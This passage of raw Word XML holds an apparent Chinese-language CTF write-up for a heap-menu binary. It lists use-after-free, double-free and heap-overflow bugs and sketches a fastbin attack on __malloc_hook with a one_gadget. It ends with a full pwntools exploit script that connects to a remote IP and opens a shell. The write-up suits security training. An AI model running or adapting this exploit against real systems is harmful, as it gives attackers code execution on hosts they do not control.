          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未清零指针：</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">qword_2020C0[v0] = NULL;  </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>←</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缺失！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEB81B7" w14:textId="77777777" w:rsidR="004F7831" w:rsidRDefault="004F7831">
      <w:r w:rsidRPr="00E30C44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AF19AFC" wp14:editId="01D3ACD6">
            <wp:extent cx="3009900" cy="1541188"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="74515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8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124" cy="15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831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Double Free</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于指针未清零，可多次</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>free</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同一地址</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>free(ptr);</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>free(ptr);  // Double Free</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：堆溢出</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>// sub_B8E() - edit</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>read(0, (void *)qword_2020C0[v2], v1);</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未检查</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v1</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否超过原</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>malloc</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBFD240" w14:textId="02C63057" w:rsidR="004F7831" w:rsidRDefault="004F7831">
      <w:r w:rsidRPr="00E30C44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08393BFF" wp14:editId="16BF5692">
            <wp:extent cx="3621722" cy="2144865"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="263837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7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551" cy="21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831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用思路：</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、泄露</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基址：利用</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAF</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>freed chunk</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main_arena</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指针</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fastbin Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：通过</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Double Free</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastbin</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链表</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、覆写</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>malloc_hook</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：将</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__malloc_hook-0x23</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处构造</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fake chunk</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，最终控制执行流</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>One Gadget</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：写入</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>one_gadget</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，触发</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终完整</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exp:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>from pwn import *</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>context(os='linux', arch='amd64', log_level='debug')</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>elf = ELF("./pwn")</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t>libc = ELF("./libc.so.6")</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t>def get_connection():</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">    return process("./pwn") if args.LOCAL else remote("113.201.14.253", 18408)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t>class HeapManager:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    def __init__(self, p):</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.p = p</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">    def menu(self, choice):</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.p.recvuntil(b"choice:\n")</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.p.sendline(str(choice).encode())</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">    def add(self, idx, size):</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.menu(8)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.p.sendlineafter(b"index:\n", str(idx).encode())</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.p.sendlineafter(b"size:\n", str(size).encode())</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">    def free(self, idx):</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.menu(4)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.p.sendlineafter(b"index:\n", str(idx).encode())</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">    def show(self, idx):</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.menu(0)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.p.sendlineafter(b"index:\n", str(idx).encode())</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        return u64(self.p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">    def edit(self, idx, length, content):</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.menu(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.p.sendlineafter(b"index:\n", str(idx).encode())</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.p.sendlineafter(b"length:\n", str(length).encode())</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:cr/>
        <w:t xml:space="preserve">        self.p.sendafter(b"content:\n", conten</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主利用逻辑</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>def exploit():</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    p = get_connection()</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap = HeapManager(p)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# 1. </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄露</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基址（</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAF</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.add(0, 0x80)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.add(1, 0x68)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.add(2, 0x68)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.free(0)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    libc_base = heap.show(0) - 3951480  # main_arena+88</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    log.success(f"libc_base = {hex(libc_base)}")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# 2. fastbin double free </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造循环链表</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.add(3, 0x80)  # </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止合并</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.free(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.free(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    heap.free(1)  # 1</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1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# 3. </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastbin</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>malloc_hook-0x23</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    malloc_hook = libc_base + libc.sym["__malloc_hook"] - 0x23</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    ogg = libc_base + 0x4527a</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    realloc = libc_base + libc.sym["__libc_realloc"]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heap.add(4, 0x68)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.edit(4, 0x10, p64(malloc_hook) * 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.add(5, 0x68)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.add(6, 0x68)  # </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fd</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>malloc_hook-0x23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# 4. </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>one_gadget</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    payload = b"A"*0xb + p64(ogg) + p64(realloc + 4)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.add(7, 0x68)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.edit(7, 0x68, payload)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# 5. </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>malloc_hook</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    heap.add(8, 0x10)  # </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>idx=8</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    p.interactive()</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:cr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exploit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F7831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
